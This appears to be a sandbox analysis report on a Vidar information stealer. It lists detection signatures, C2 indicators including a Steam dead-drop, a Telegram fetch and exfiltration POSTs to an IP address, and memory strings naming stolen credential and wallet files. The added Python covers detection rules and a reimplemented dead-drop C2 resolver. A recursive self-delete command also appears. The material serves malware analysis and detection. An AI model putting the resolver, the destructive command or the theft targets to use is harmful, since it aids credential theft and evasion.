Windows Analysis Report
x9Lh8czsmo.exe

Overview

General Information

Sample name: x9Lh8czsmo.exe
renamed because original name is a hash value
Original sample name: b2866657421dc1115cb70555c84da220dececce78879b800a8ca79fddfba993c.exe
Analysis ID: 1597386
MD5: 4de25ac5b7602cb6b41bba4282e6a002
SHA1: 1cfe4a7735ee81515b0b44e9a901642a52c51c36
SHA256: b2866657421dc1115cb70555c84da220dececce78879b800a8ca79fddfba993c
Tags: exe, vidar, user-Lars

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match
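Three of the signatures above describe process-level behaviour that a SOC can alert on independently of the file hash: "Attempt to bypass Chrome Application-Bound Encryption" together with "Sigma detected: Browser Started with Remote Debugging" (the sample launches a browser it can drive over DevTools), "Sigma detected: Silenttrinity Stager Msbuild Activity" (MSBuild.exe, here the injected host process, makes its own outbound connections), and the delayed self-delete string found in memory (`/c timeout /t 10 & rd /s /q ...`). The following detection logic is an added example written for this page; it is not a Joe Sandbox or Sigma artefact and does not reproduce the exact Sigma rule conditions. The event records are constructed in the style of Sysmon process-creation and network-connection logs, so the field names (`image`, `cmdline`, `parent`, `dest`) are assumptions; the Chrome command line is likewise constructed (the report only shows the port 9223 string), while the MSBuild.exe path, the parent path on the user's desktop, and the 88.99.120.106:443 destination are taken from the report.

```python
"""Process-level detections for the behaviours this report attributes to the sample.

Added example, not the sample's or the sandbox's code.  Events are constructed in a
Sysmon-like shape (field names are assumptions, not a real log format).
"""
import re
from typing import Callable, Dict, List

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
# Parents living in user-writable locations are unusual launchers of MSBuild.exe.
USER_WRITABLE = re.compile(r"\\(users|appdata|programdata|temp)\\", re.IGNORECASE)

# Constructed sample events (not copied from the report's behaviour log).
EVENTS: List[Dict[str, str]] = [
    {"id": "1", "type": "process_create",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Users\user\Desktop\x9Lh8czsmo.exe"},
    {"id": "2", "type": "network_connect",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "dest": "88.99.120.106:443"},
    {"id": "3", "type": "process_create",   # assumed command line; port 9223 is from the report
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9223 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data"',
     "parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"id": "4", "type": "process_create",   # shape of the self-delete string seen in memory
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd.exe /c timeout /t 10 & rd /s /q "C:\ProgramData\abc123"',
     "parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"id": "5", "type": "process_create",   # benign control: MSBuild launched by Visual Studio
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe proj.csproj",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_browser_remote_debugging(ev: Dict[str, str]) -> bool:
    # A browser started with a DevTools port exposes cookies/logins to any local
    # client, which is how App-Bound Encryption is sidestepped.
    return (ev["type"] == "process_create"
            and basename(ev["image"]) in BROWSERS
            and "--remote-debugging-port=" in ev["cmdline"].lower())


def rule_msbuild_from_user_writable_parent(ev: Dict[str, str]) -> bool:
    return (ev["type"] == "process_create"
            and basename(ev["image"]) == "msbuild.exe"
            and USER_WRITABLE.search(ev["parent"]) is not None)


def rule_msbuild_outbound_connection(ev: Dict[str, str]) -> bool:
    # A build tool has no business talking to the internet on its own.
    return ev["type"] == "network_connect" and basename(ev["image"]) == "msbuild.exe"


def rule_delayed_self_delete(ev: Dict[str, str]) -> bool:
    cl = ev.get("cmdline", "").lower()
    return (ev["type"] == "process_create"
            and basename(ev["image"]) == "cmd.exe"
            and "timeout /t" in cl
            and ("rd /s /q" in cl or "del " in cl))


RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    "browser_remote_debugging": rule_browser_remote_debugging,
    "msbuild_from_user_writable_parent": rule_msbuild_from_user_writable_parent,
    "msbuild_outbound_connection": rule_msbuild_outbound_connection,
    "delayed_self_delete": rule_delayed_self_delete,
}


def evaluate(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id -> names of the rules it triggered (events with no hit are omitted)."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(ev["id"], []).append(name)
    return hits


if __name__ == "__main__":
    for event_id, names in evaluate(EVENTS).items():
        print(event_id, ", ".join(names))
```

The benign control event (MSBuild.exe spawned by devenv.exe) produces no hit, which is the point of keying the MSBuild rule on the parent's location rather than on the image alone; the outbound-connection rule is what turns the injected MSBuild.exe in this report into a high-confidence alert.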

Classification

(Classification chart rendered as a widget in the original report. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Verdict scale: clean, suspicious, malicious.)

AV Detection

Source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: x9Lh8czsmo.exe ReversingLabs: Detection: 52%
Source: x9Lh8czsmo.exe Virustotal: Detection: 43%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: x9Lh8czsmo.exe Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_00405FE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree, 2_2_0040E7E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey, 2_2_00406062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040627F LocalAlloc,BCryptDecrypt, 2_2_0040627F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 2_2_0040609C
Source: x9Lh8czsmo.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49741 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.120.106:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: x9Lh8czsmo.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram 
Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 2_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 2_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 2_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 2_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_05C9D3C0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D20AA0h 0_2_05D2069A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D20AA0h 0_2_05D206A8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D2104Ch 0_2_05D20E38
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D2104Ch 0_2_05D20E28
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05ED3E38h 0_2_05ED3D80
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05ED3E38h 0_2_05ED3D79
Source: chrome.exe Memory has grown: Private usage: 7MB later: 39MB

Networking

Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49714 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.8:49712 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.8:49708 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49713 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49734 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49740 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49740 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49742 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49742 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 88.99.120.106:443 -> 192.168.2.8:49712
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49743 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49738 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49738 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 88.99.120.106:443 -> 192.168.2.8:49710
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49775 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49788 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49788 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49785 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49785 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49786 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49786 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49789 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49789 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49787 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49787 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49793 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49790 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49790 -> 88.99.120.106:443
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199819539662
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
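The extracted configuration names a Steam profile URL as the "C2 url", and the first request in the capture is a plain GET for a t.me path; only afterwards does the stealer start posting to 88.99.120.106. That is the dead-drop pattern: the real C2 is not in the binary but published on a legitimate site the sample fetches and parses. The following resolver is an added example, not the sample's code, and it assumes (the report does not show the page contents) that the operator places the C2 URL in the Steam profile's persona name and in the Telegram channel description. The two HTML fragments are constructed for illustration and use a documentation IP (198.51.100.23), not the address from this report.

```python
"""Resolve a dead-drop C2 the way a Vidar-style stealer does (added example).

Assumptions, not confirmed by the report: the Steam persona name and the Telegram
channel description carry the C2 URL.  The HTML below is constructed.
"""
import re
from html import unescape
from ipaddress import ip_address
from typing import Optional
from urllib.parse import urlsplit

# Constructed Steam profile fragment: the nickname is the payload.
STEAM_PROFILE_HTML = """<html><body>
<div class="profile_header">
  <span class="actual_persona_name">https://198.51.100.23/</span>
</div></body></html>"""

# Constructed Telegram channel preview: the description is the payload.
TELEGRAM_PREVIEW_HTML = """<html><head>
<meta property="og:description" content="https://198.51.100.23/">
</head></html>"""

URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/?")


def extract_steam_persona(html: str) -> Optional[str]:
    m = re.search(r'class="actual_persona_name">([^<]*)<', html)
    return unescape(m.group(1)).strip() if m else None


def extract_telegram_description(html: str) -> Optional[str]:
    m = re.search(r'property="og:description"\s+content="([^"]*)"', html)
    return unescape(m.group(1)).strip() if m else None


def resolve_dead_drop(html: str, source: str) -> Optional[str]:
    """Return the C2 URL hidden in the page, or None if the field holds no URL."""
    if source == "steam":
        text = extract_steam_persona(html)
    elif source == "telegram":
        text = extract_telegram_description(html)
    else:
        raise ValueError("unknown dead-drop source: %s" % source)
    if not text:
        return None
    m = URL_RE.search(text)
    return m.group(0).rstrip("/") if m else None


def c2_host(url: str) -> str:
    return urlsplit(url).hostname or ""


def is_literal_ip(host: str) -> bool:
    """Dead-drop C2s are typically bare IPs; a literal IP host is a stronger IOC."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for src, page in (("steam", STEAM_PROFILE_HTML), ("telegram", TELEGRAM_PREVIEW_HTML)):
        url = resolve_dead_drop(page, src)
        print(src, url, "literal-ip" if url and is_literal_ip(c2_host(url)) else "")
```

For hunting, the same two extractors can be run against the live profile and channel from the configuration; a persona name or channel description that is nothing but a URL to a bare IP is the indicator, and it changes whenever the operator rotates infrastructure, so the profile URL is the durable IOC and the IP is not.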
Source: Joe Sandbox View IP Address: 2.23.209.13
Source: Joe Sandbox View IP Address: 13.107.246.45
Source: Joe Sandbox View IP Address: 18.244.18.27
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
